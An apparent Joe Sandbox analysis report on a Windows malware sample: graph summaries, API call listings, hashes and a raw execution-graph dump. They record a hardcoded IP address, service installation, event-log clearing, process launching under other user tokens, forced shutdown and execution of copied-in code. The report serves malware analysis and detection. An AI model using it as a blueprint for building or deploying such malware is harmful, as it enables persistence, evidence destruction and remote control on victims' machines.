                                                                                          • Opcode ID: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                          • Instruction ID: 0b57e97574c49083c60be4e0953d33bf3402ecf870afa031020ca03fe4ac14e9
                                                                                          • Opcode Fuzzy Hash: 503e30a7f5baba76d2006de02f8aabc9fecde34cd01d4e51a3acff696a7f97a2
                                                                                          • Instruction Fuzzy Hash: 36F06234E41348FBEB10DFA49D0AF9E7F785B04705F2081A4F6507B2C1C6B96B008B58

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 97 401aee-401b29 call 4010dd call 401a63 102 401b2b-401b2d 97->102 103 401b2f-401b4e memcpy call 401000 97->103 104 401b65-401b68 102->104 106 401b53-401b5d 103->106 107 401b63 106->107 108 401b5f-401b61 106->108 107->104 108->104
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(-004032A0,103.36.221.195,00000228,?,?,?,?,?,?,0040151F), ref: 00401B42
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID: 103.36.221.195
                                                                                          • API String ID: 3510742995-2989038800
                                                                                          • Opcode ID: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                          • Instruction ID: 35b040e23320f7c57e1bee8842fc800d469dc723e7eedb9ee6c7bb718427654e
                                                                                          • Opcode Fuzzy Hash: 1d9d4e6a103436fa6d4a87c3801ee709b09ed6f15207dc39c5cfe36b8e263f2a
                                                                                          • Instruction Fuzzy Hash: CDF09671E80304B7EB10AE609D47B6A36685B21745F2040BBF904772D2F67E7725529D

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 109 402a60-402a75 #1576
                                                                                          APIs
                                                                                          • #1576.MFC42(00402A06,00402A06,00402A06,00402A06,00402A06,00000000,?,0000000A), ref: 00402A70
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #1576
                                                                                          • String ID:
                                                                                          • API String ID: 1976119259-0
                                                                                          • Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction ID: 2e8f5fa0b2b7dc8462a5570c84725da21d48d42b60ee068d54710228b117be70
                                                                                          • Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
                                                                                          • Instruction Fuzzy Hash: BFB00836118386ABCB12EE95890592ABAA6BB98304F484C1DB2A1500A287668428EB16
                                                                                          APIs
                                                                                          • IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Iconic
                                                                                          • String ID:
                                                                                          • API String ID: 110040809-0
                                                                                          • Opcode ID: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                          • Instruction ID: 5de610e982ba27cc53666b937cb18e62fe31540b2012b128af7b5849c0221d0a
                                                                                          • Opcode Fuzzy Hash: 1ee85660d1dedbebd5f403de0e96ef1f5b119a627276ba2acc2b378afb4465c5
                                                                                          • Instruction Fuzzy Hash: 09C012B090820CAB8708CF98EA00C29BBACEB09301B0002DCF808933008A32AE009A98

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 110 40187b-401970 LoadLibraryA GetProcAddress * 4 GetTickCount wsprintfA 115 401972-401979 FreeLibrary 110->115 116 40197f-401982 110->116 115->116
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040188F
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 004018A7
                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 004018BF
                                                                                          • GetProcAddress.KERNEL32(?,MoveFileA), ref: 004018D7
                                                                                          • GetProcAddress.KERNEL32(?,MoveFileExA), ref: 004018EF
                                                                                          • GetTickCount.KERNEL32 ref: 00401921
                                                                                          • wsprintfA.USER32 ref: 0040193B
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401979
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CountFreeLoadTickwsprintf
                                                                                          • String ID: %s\%d.bak$GetModuleFileNameA$GetSystemDirectoryA$MoveFileA$MoveFileExA$kernel32.dll
                                                                                          • API String ID: 2704705959-706646508
                                                                                          • Opcode ID: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                          • Instruction ID: 278943a665a34f5de4912a77712433a3c03d867667eba4ba3f010f6a07107de3
                                                                                          • Opcode Fuzzy Hash: 439d6103ebf8e8c0a2e54ea9977356cebfa60b531f2e9e129bb2cebecea63de2
                                                                                          • Instruction Fuzzy Hash: B12151B5D85218ABEB20DF60CC8DBE9BB78EB54701F1041E5A649B2191DBB49FC0CF64

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 117 401c18-401ce6 memset * 2 LoadLibraryA GetProcAddress * 3 119 401ce8 117->119 120 401cea-401d12 117->120 121 401d2c-401d59 call 401d3a 119->121 120->121 124 401d14-401d25 lstrcpyA 120->124 127 401d68-401d7b 121->127 128 401d5b-401d62 FreeLibrary 121->128 124->121 128->127
                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 00401C59
                                                                                          • memset.MSVCRT ref: 00401C69
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 00401C76
                                                                                          • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 00401C8E
                                                                                          • GetProcAddress.KERNEL32(?,RegQueryValueExA), ref: 00401CA3
                                                                                          • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 00401CB8
                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 00401D1F
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00401D62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Librarymemset$FreeLoadlstrcpy
                                                                                          • String ID: ADVAPI32.dll$RegCloseKey$RegOpenKeyExA$RegQueryValueExA
                                                                                          • API String ID: 3313493744-123098875
                                                                                          • Opcode ID: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                          • Instruction ID: ee5ed84a35279ae09bc0a5aec9c8e8049356c5a81716acae3ba6bb287f67954d
                                                                                          • Opcode Fuzzy Hash: 6cfc459c3633b96d3d6a7f6576698e4911ea3d3d1c7daab3c8c40142335194e9
                                                                                          • Instruction Fuzzy Hash: 93314FB5940218ABDB10DF90DD85FDEBBB8AF48710F10416AF605B62D0D778AE44CF64

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • #355.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402133
                                                                                          • #2515.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402145
                                                                                          • #540.MFC42(00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040217A
                                                                                          • #2818.MFC42(?,00409D58,?,00000000,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402190
                                                                                          • #3499.MFC42(?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021C5
                                                                                          • #6907.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 004021FB
                                                                                          • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 0040220A
                                                                                          • #800.MFC42(?,00000001,00000000,?,?,00000000,00000000,00000004,All Files (*.*)|*.*||,?), ref: 00402216
                                                                                            • Part of subcall function 004022C0: #800.MFC42(?,00000000,00402B79,000000FF,?,0040222D,?,00000001,00000000,?,?,00000000), ref: 004022EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #800$#2515#2818#3499#355#540#6907
                                                                                          • String ID: All Files (*.*)|*.*||
                                                                                          • API String ID: 1584807323-1256402831
                                                                                          • Opcode ID: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                          • Instruction ID: c5d4932d0e26176f48f047347bf5286b918a9edaf58949088f637132c46f74e5
                                                                                          • Opcode Fuzzy Hash: 4922d2615448acd3483173aa7a39ffc0c03dd6e8f39ba40f8db02418d57e1958
                                                                                          • Instruction Fuzzy Hash: D0316D7198011CABCB14EB94CE5ABEDB774BB10304F1042AEE115772C1DAB41E44CB69

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 144 4016eb-401720 call 401e60 _access 147 401722-40172c call 401e20 144->147 148 40172e 144->148 147->148 152 401730-401781 #5683 #4129 call 4016eb #800 call 401e60 _mkdir 147->152 150 401784-401791 148->150 152->150
                                                                                          APIs
                                                                                          • _access.MSVCRT ref: 00401714
                                                                                          • #5683.MFC42(0000005C,?,?,?,?,?,?), ref: 00401735
                                                                                          • #4129.MFC42(?,00000000,0000005C,?,?,?,?,?,?), ref: 00401742
                                                                                          • #800.MFC42(?,00000000,0000005C,?,?,?,?,?), ref: 0040176D
                                                                                          • _mkdir.MSVCRT ref: 0040177B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: #4129#5683#800_access_mkdir
                                                                                          • String ID:
                                                                                          • API String ID: 2252135049-0
                                                                                          • Opcode ID: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                          • Instruction ID: e64eea6ac71e0944d3c5090b23e1d4b3a6541fea866ff8cfdbd13ca0f40ae5ed
                                                                                          • Opcode Fuzzy Hash: fe9398ada3c2d6f7717ef24858e2bc8e3691a59763239764df60b612b1b35ab5
                                                                                          • Instruction Fuzzy Hash: A71160709001099BCB00EFA5CD45BAEBB79EB00354F10423EF826B72D0DB385A01CB99

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00402400: IsIconic.USER32(E8844D8D), ref: 0040240E
                                                                                          • #470.MFC42(?), ref: 00402004
                                                                                            • Part of subcall function 004023D0: SendMessageA.USER32(?,00000000,00000000,00000027), ref: 004023EA
                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 0040202A
                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00402035
                                                                                            • Part of subcall function 00402420: GetClientRect.USER32(?,U @), ref: 00402432
                                                                                            • Part of subcall function 004023A0: DrawIcon.USER32(00000000,?,?,?), ref: 004023BA
                                                                                          • #755.MFC42(?,?,?,?), ref: 004020A8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1685074375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1685051540.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685102924.0000000000403000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000001.00000002.1685127524.000000000040B000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_400000_UNK_.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$#470#755ClientDrawIconIconicMessageRectSend
                                                                                          • String ID:
                                                                                          • API String ID: 2506822835-0
                                                                                          • Opcode ID: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                          • Instruction ID: 4f4a8c447454e0b861ef3f698e30a861443d70d21ee0d95d9e798c61fe4189de
                                                                                          • Opcode Fuzzy Hash: 1c9899e63e8db84197f4d426d0ee9b49cb4c862dee0a21bfd3b4b5b287d3fdbe
                                                                                          • Instruction Fuzzy Hash: 15212D719001099BCB14EFB4DE4ABEDB774BB08304F14826EE515B32D1DF786904CB58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2940590142.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_54e0000_Synaptics.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #28
                                                                                          • API String ID: 0-3617282389
                                                                                          • Opcode ID: 92fd416d7204f29dbb9520438ccbe2311b85cead8b3d2b40539c6881818c90dd
                                                                                          • Instruction ID: 0f361d851a32ffbf2df937e5c1037acb3045c5d3151cfb79a4848a0df0860fd4
                                                                                          • Opcode Fuzzy Hash: 92fd416d7204f29dbb9520438ccbe2311b85cead8b3d2b40539c6881818c90dd
                                                                                          • Instruction Fuzzy Hash: A1613F2141E3E19FC3179F3899546C2BFB4BE8B32075806DED8C18F263E325648AC392

                                                                                          Execution Graph

                                                                                          Execution Coverage:10%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:15.7%
                                                                                          Total number of Nodes:642
                                                                                          Total number of Limit Nodes:4
1702->1704 1703->1704 1703->1711 1705 100039ba 4 API calls 1704->1705 1706 10003961 1705->1706 1707 10003b9e 6 API calls 1706->1707 1708 1000397d 1707->1708 1710 10003a67 2 API calls 1708->1710 1712 10003988 1708->1712 1709 10003d5d 5 API calls 1709->1711 1710->1712 1711->1692 1711->1693 1712->1709 1712->1711 1715 1000254b 1713->1715 1716 10003cee 1713->1716 1714 10003d15 _stricmp 1714->1715 1714->1716 1715->1698 1716->1714 1716->1715 1717 1000246d 1720 100023fa printf 1717->1720 1721 1000389d 24 API calls 1720->1721 1722 10002414 1721->1722 1723 10002429 1722->1723 1724 1000241c OutputDebugStringA 1722->1724 1726 10003cd2 _stricmp 1723->1726 1725 10002448 printf 1724->1725 1728 10002468 1725->1728 1729 10002458 VirtualFree 1725->1729 1727 10002434 1726->1727 1730 10003d5d 5 API calls 1727->1730 1729->1728 1731 10002445 1730->1731 1731->1725 1262 1000336e strncpy wcstombs RegisterServiceCtrlHandlerA 1263 10003585 1262->1263 1264 100033c6 FreeConsole 1262->1264 1282 1000318a SetServiceStatus 1264->1282 1266 100033d6 1283 1000318a SetServiceStatus 1266->1283 1268 100033df GetVersionExA 1269 10003566 Sleep 1268->1269 1270 10003406 1268->1270 1269->1263 1271 10003578 1269->1271 1272 10003419 8 API calls 1270->1272 1273 1000340f MainThread 1270->1273 1271->1263 1271->1269 1274 100034aa GetLastError 1272->1274 1275 100034cb GetModuleFileNameA wsprintfA 1272->1275 1273->1269 1274->1275 1276 100034b5 wsprintfA 1274->1276 1277 10003507 Sleep GetExitCodeProcess 1275->1277 1276->1275 1278 10003526 CloseHandle Sleep 1277->1278 1281 10003544 1277->1281 1284 10001fbd 7 API calls 1278->1284 1280 10003556 WaitForSingleObject CloseHandle 1280->1269 1281->1277 1281->1280 1282->1266 1283->1268 1285 100020b1 1284->1285 1286 10002059 SetTokenInformation 1284->1286 1288 100020c1 1285->1288 1289 100020b8 FreeLibrary 1285->1289 1290 10002079 CreateProcessAsUserA CloseHandle CloseHandle 1286->1290 1288->1281 1289->1288 1290->1285 1732 1000386e 1737 1000388a CloseHandle 1732->1737 1734 
10003876 1735 10003884 1734->1735 1736 1000387d ??3@YAXPAX 1734->1736 1736->1735 1737->1734 1738 10003134 1743 10001e37 1738->1743 1763 10004c68 1743->1763 1745 10001e41 wsprintfA 1764 10001b5b OpenSCManagerA 1745->1764 1748 10004a93 9 API calls 1749 10001ede memset lstrcpyA lstrlenA 1748->1749 1750 10004a93 9 API calls 1749->1750 1751 10001f23 1750->1751 1776 10001a43 OpenSCManagerA 1751->1776 1754 1000304f wsprintfA strlen 1755 1000308c strlen 1754->1755 1756 100030ad strlen 1754->1756 1758 10004a93 9 API calls 1755->1758 1757 10004a93 9 API calls 1756->1757 1759 100030d0 GetLocalTime wsprintfA strlen 1757->1759 1760 100030aa 1758->1760 1761 10004a93 9 API calls 1759->1761 1760->1756 1762 1000312c 1761->1762 1763->1745 1765 10001ba3 _local_unwind2 1764->1765 1766 10001bb8 CreateServiceA 1764->1766 1767 10001e06 wsprintfA strlen 1765->1767 1768 10001c25 ChangeServiceConfig2A ChangeServiceConfig2A wsprintfA strlen 1766->1768 1769 10001bf5 GetLastError 1766->1769 1767->1748 1770 10004a93 9 API calls 1768->1770 1769->1768 1771 10001c02 OpenServiceA 1769->1771 1772 10001dea StartServiceA 1770->1772 1773 10001c1c StartServiceA 1771->1773 1774 10001dfa 1771->1774 1772->1774 1773->1768 1788 10001e1d 1774->1788 1777 10001a60 OpenServiceA 1776->1777 1778 10001ac8 1776->1778 1779 10001ac1 1777->1779 1780 10001a75 StartServiceA 1777->1780 1778->1754 1781 10001ac2 CloseServiceHandle 1779->1781 1780->1778 1782 10001a84 GetLastError 1780->1782 1781->1778 1783 10001a91 CloseServiceHandle 1782->1783 1784 10001a9b QueryServiceStatus 1782->1784 1783->1781 1785 10001aba CloseServiceHandle 1784->1785 1786 10001aaa 1784->1786 1785->1779 1786->1785 1787 10001ab0 Sleep 1786->1787 1787->1784 1789 10001e21 CloseServiceHandle 1788->1789 1790 10001e28 1788->1790 1789->1790 1791 10001e36 1790->1791 1792 10001e2d CloseServiceHandle 1790->1792 1791->1767 1792->1791 1793 10002d74 1794 10002d79 1793->1794 1797 10004d20 1794->1797 1800 10004cf4 1797->1800 1799 10002d92 1801 10004d09 __dllonexit 
1800->1801 1802 10004cfd _onexit 1800->1802 1801->1799 1802->1799 1803 10002d35 strrchr 1804 10002d70 1803->1804 1805 10002d49 1803->1805 1806 10004529 12 API calls 1805->1806 1807 10002d53 1806->1807 1807->1804 1808 1000248b 2 API calls 1807->1808 1809 10002d5f 1808->1809 1809->1804 1812 1000273d GetModuleFileNameA 1809->1812 1811 10002d6a 1813 10002764 wsprintfA 1812->1813 1814 10002785 wsprintfA 1812->1814 1815 100027a1 WinExec 1813->1815 1814->1815 1815->1811 1816 10003df6 1821 10003e12 1816->1821 1819 10003e05 ??3@YAXPAX 1820 10003e0c 1819->1820 1822 10003e29 FreeLibrary 1821->1822 1823 10003e2c 1821->1823 1822->1823 1824 10003e33 FreeLibrary 1823->1824 1825 10003e36 1823->1825 1824->1825 1826 10003e40 1825->1826 1827 10003e3d FreeLibrary 1825->1827 1828 10003e47 FreeLibrary 1826->1828 1829 10003e4a 1826->1829 1827->1826 1828->1829 1830 10003e51 FreeLibrary 1829->1830 1831 10003e54 1829->1831 1830->1831 1832 10003e5b FreeLibrary 1831->1832 1833 10003dfe 1831->1833 1832->1833 1833->1819 1833->1820 1834 100032f7 1835 10003347 1834->1835 1836 100032ff 1834->1836 1852 1000318a SetServiceStatus 1835->1852 1838 10003302 1836->1838 1839 10003335 1836->1839 1841 1000331b 1838->1841 1843 10003305 1838->1843 1851 1000318a SetServiceStatus 1839->1851 1840 10003353 Sleep 1840->1843 1849 1000318a SetServiceStatus 1841->1849 1846 10003330 1843->1846 1853 1000318a SetServiceStatus 1843->1853 1845 10003327 1850 1000318a SetServiceStatus 1845->1850 1849->1845 1850->1846 1851->1845 1852->1840 1853->1846 1854 10002f7b 1855 10001acf 8 API calls 1854->1855 1856 10002f90 1855->1856 1857 10003043 1856->1857 1865 100020c8 6 API calls 1856->1865 1859 10002f9f wsprintfA CreateProcessA GetModuleFileNameA GetFileAttributesA 1860 10003013 1859->1860 1861 10003018 GetLastError 1860->1861 1862 1000303d 1860->1862 1861->1862 1863 10003023 Sleep GetFileAttributesA 1861->1863 1864 10001a43 9 API calls 1862->1864 1863->1860 1864->1857 1865->1859 1866 100021ff 1867 10002216 1866->1867 1899 
10002239 1866->1899 1868 1000235f VirtualAlloc 1867->1868 1869 1000221f 1867->1869 1870 1000237e memcpy 1868->1870 1868->1899 1871 100022c0 1869->1871 1872 10002284 1869->1872 1873 10002308 1869->1873 1874 100022aa 1869->1874 1875 1000223e 1869->1875 1876 1000222f 1869->1876 1877 100022cf 1869->1877 1878 10002251 1869->1878 1879 10002312 VirtualAlloc 1869->1879 1880 10002293 1869->1880 1881 10002353 1869->1881 1882 100022b5 1869->1882 1883 1000229f 1869->1883 1869->1899 1960 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1870->1960 1949 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1871->1949 1912 10002bc3 strlen 1872->1912 1950 10002583 1873->1950 1933 10002b96 1874->1933 1906 100026df wsprintfA 1875->1906 1901 100025a2 1876->1901 1944 1000260e LocalAlloc 1877->1944 1911 100042ee CreateEventA _beginthreadex WaitForSingleObject CloseHandle 1878->1911 1887 10002330 memcpy 1879->1887 1879->1899 1889 1000273d 4 API calls 1880->1889 1955 1000265e 1881->1955 1939 10002b58 EnumWindows 1882->1939 1922 100029b6 memcpy CreateFileA 1883->1922 1897 100023fa 29 API calls 1887->1897 1889->1899 1896 10002264 Sleep 1896->1899 1897->1899 1961 10004666 6 API calls 1901->1961 1904 10004666 11 API calls 1905 100025c6 1904->1905 1905->1899 1907 10002713 strlen 1906->1907 1908 1000270e 1906->1908 1909 10004a93 9 API calls 1907->1909 1908->1907 1910 10002737 1909->1910 1910->1899 1911->1896 1913 10002c90 1912->1913 1914 10002bdf memset 1912->1914 1913->1899 1915 10004822 13 API calls 1914->1915 1916 10002c10 1915->1916 1916->1913 1917 10002c17 lstrlenA 1916->1917 1917->1913 1918 10002c28 strstr 1917->1918 1918->1913 1919 10002c40 lstrcpyA 1918->1919 1920 10002c60 CreateProcessA 1919->1920 1920->1913 1923 10002a32 1922->1923 1924 10002a12 WriteFile 1922->1924 1923->1899 1924->1923 1925 10002a39 CloseHandle strlen 1924->1925 1926 10002a51 wsprintfA 1925->1926 1927 10002a76 lstrcpyA 1925->1927 1928 10002a8a 1926->1928 1927->1928 1929 10002aa9 
1928->1929 1930 10002a97 1928->1930 1970 100027bc memset strrchr 1929->1970 1930->1923 1932 1000273d 4 API calls 1930->1932 1932->1923 1989 1000473f LoadLibraryA GetProcAddress GetProcAddress GetProcAddress 1933->1989 1936 10002bbf 1936->1899 1937 10001863 16 API calls 1938 10002bba 1937->1938 1938->1899 1940 10002b74 1939->1940 1941 10002b8b 1939->1941 1996 10002ac4 IsWindowVisible 1939->1996 1942 10001863 16 API calls 1940->1942 1941->1899 1943 10002b86 1942->1943 1943->1899 1945 10002622 memcpy LocalSize 1944->1945 1946 1000265c 1944->1946 1947 10001863 16 API calls 1945->1947 1946->1899 1948 1000264d Sleep LocalFree 1947->1948 1948->1946 1949->1899 1951 1000258c 1950->1951 1952 1000259f 1950->1952 1953 10003cd2 _stricmp 1951->1953 1952->1899 1954 10002597 1953->1954 1954->1899 1958 10002680 1955->1958 1956 100026b4 OpenEventLogA 1957 100026c4 ClearEventLogA CloseEventLog 1956->1957 1956->1958 1957->1958 1958->1956 1959 100026da 1958->1959 1959->1899 1960->1899 1963 100046c3 1961->1963 1962 100025b0 ExitWindowsEx 1962->1904 1963->1962 1964 100046fc LoadLibraryA GetProcAddress 1963->1964 1965 1000470d CloseHandle 1964->1965 1967 10004728 FreeLibrary 1965->1967 1968 1000472b 1965->1968 1967->1968 1968->1962 1969 10004731 FreeLibrary 1968->1969 1969->1962 1971 100027f6 strrchr 1970->1971 1972 100028f3 1970->1972 1973 10002846 strcpy 1971->1973 1974 1000281d strlen 1971->1974 1972->1923 1975 10002857 1973->1975 1976 10002827 1974->1976 1977 10004822 13 API calls 1975->1977 1976->1975 1979 10002832 strncpy 1976->1979 1978 10002875 1977->1978 1978->1972 1980 1000287c memset wsprintfA memset 1978->1980 1979->1975 1981 10004822 13 API calls 1980->1981 1982 100028ec 1981->1982 1982->1972 1983 100028fa ExpandEnvironmentStringsA strstr 1982->1983 1984 10002929 strstr 1983->1984 1985 1000295f lstrcpyA 1983->1985 1984->1985 1986 1000293d lstrcatA lstrcatA 1984->1986 1987 10002969 CreateProcessA 1985->1987 1986->1987 1987->1972 1995 10004788 1989->1995 1990 100047cf 
CloseHandle 1991 10002ba3 1990->1991 1992 100047da FreeLibrary 1990->1992 1991->1936 1991->1937 1992->1991 1993 100047a7 lstrcmpiA 1994 100047c8 1993->1994 1993->1995 1994->1990 1995->1990 1995->1993 1997 10002b43 1996->1997 1998 10002ada SendMessageA lstrlenA 1996->1998 1998->1997 1999 10002b1d _strupr _strupr strstr 1998->1999 1999->1997

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,1000383C,10004E5A,?,?,?,?,?,?), ref: 10003E85
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 10003E96
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetModuleFileNameA), ref: 10003EA3
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CreateMutexA), ref: 10003EB0
                                                                                          • GetProcAddress.KERNEL32(74DD0000,ReleaseMutex), ref: 10003EBD
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetLastError), ref: 10003ECA
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CloseHandle), ref: 10003ED7
                                                                                          • GetProcAddress.KERNEL32(74DD0000,Sleep), ref: 10003EE4
                                                                                          • GetProcAddress.KERNEL32(74DD0000,lstrcatA), ref: 10003EF1
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetTickCount), ref: 10003EFE
                                                                                          • GetProcAddress.KERNEL32(74DD0000,WaitForSingleObject), ref: 10003F0B
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetFileAttributesA), ref: 10003F18
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CreateEventA), ref: 10003F25
